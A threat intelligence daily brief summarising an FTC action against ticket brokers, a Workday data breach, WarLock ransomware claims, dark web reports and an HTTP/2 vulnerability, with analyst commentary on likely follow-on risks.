ZeroFox Daily Intelligence Brief - August 19, 2025

ZeroFox Daily Intelligence Brief - August 19, 2025

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Nearly 380K Tickets Illegally Bought and Resold in FTC Complaint Against Brokers
• Workday Confirms Data Breach Linked to Third-Party Database
• WarLock Ransomware Claims to have Breached Colt Telecom and Hitachi

Nearly 380K Tickets Illegally Bought and Resold in FTC Complaint Against Brokers

Source: https://www.ftc.gov/news-events/news/press-releases/2025/08/ftc-takes-action-against-ticket-resellers-using-illegal-tactics-bypass-ticket-limit-protections

What we know: FTC has sued a ticket broker operation bypassing Ticketmaster’s purchase limits and security controls to tickets for high-demand events, such as the Taylor Swift’s Eras Tour. It then resold those tickets on secondary marketplaces at inflated prices, generating millions in revenue.

Context: Threat actors created thousands of fake and third-party accounts, used virtual cards, spoofed IPs, and SIM boxes to bypass Ticketmaster’s controls. These tactics enabled them to mass-purchase nearly 380,000 tickets worth USD 57 million and resell them for USD 64 million at inflated prices.

Analyst note: After this incident, threat actors are likely to evolve their tactics by impersonating event organizers or customer support. Such schemes could drive fans to fake ticketing sites, falling for phishing emails, or counterfeit QR-code tickets that lead to the scammer's bank account instead of a legitimate ticketing platform.

Workday Confirms Data Breach Linked to Third-Party Database

Source: https://techcrunch.com/2025/08/18/hr-giant-workday-says-hackers-stole-personal-data-in-recent-breach/

What we know: Human resource (HR) tech giant Workday has confirmed a data breach at a third-party customer relationship database, exposing personal details, like names, emails, and phone numbers. The HR tech giant emphasized that no customer tenant data appears to be affected.

Context: This incident comes amid a series of cyberattacks targeting databases, particularly Salesforce-hosted platforms that many big firms rely on for customer data storage. As of writing, Workday has not disclosed which customer relationship database was breached.

Analyst note: Even without sensitive HR files, exposed contact information can lead to phishing and social engineering scams aimed at employees and clients. Third-party breaches are becoming increasingly common, as seen in the recent Salesforce attack that affected chains of companies, and it is likely that the Workday breach is also linked to that campaign.

WarLock Ransomware Claims to have Breached Colt Telecom and Hitachi

Source: https://hackread.com/warlock-ransomware-group-breach-colt-telecom-hitachi/

What we know: WarLock ransomware has claimed UK-based telecom provider Colt and Japanese conglomerate Hitachi as its latest victims on its leak site. The ransomware operation is reportedly linked to China-based threat actor “Storm-2603” and has been active since March 2025.

Context: Colt’s data is reportedly being sold for USD 200,000 on a Russian language dark web forum. Hitachi was listed briefly before being taken down, leading to speculations of possible ongoing negotiations. Separately, Australian internet provider TPG Telecom disclosed a cyber incident leaking 280,000 email addresses and around 20,000 landline phone numbers.

Analyst note: Data leaked from telecom providers is likely to be used in surveillance and further compromise of the network, also posing a national security risk. However, WarLock, a newly emerged threat actor, is yet to deliver on its claims and threats.

DEEP AND DARK WEB INTELLIGENCE

NATO allegedly breached: A threat actor on a prominent dark web forum has reportedly posted a database of 15 million records related to NATO. The breached data allegedly includes information on military hardware and strategic planning, among other sensitive information. The database is unlikely to be new data. The threat actor is likely seeking attention as the post coincides with a meeting between U.S. and European leaders including Ukrainian President Volodymyr Zelenskyy.

Noodlophile malware campaign spreads globally: Threat actors are using spear-phishing emails and updated delivery methods to spread the Noodlophile information-stealing malware, targeting enterprises in the United States, Europe, the Baltics, and the Asia-Pacific region. Such campaigns can lead to large-scale theft of sensitive corporate data, financial loss, and potential follow-on attacks like ransomware or supply chain compromises.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2025-8671: This vulnerability has been observed to bypass the Rapid Reset fix in HTTP/2 by exploiting invalid control messages to overwhelm servers. The flaw could enable cyberattacks against a large number of global websites until fully patched across vulnerable devices.

Affected products: The affected products are included in this advisory.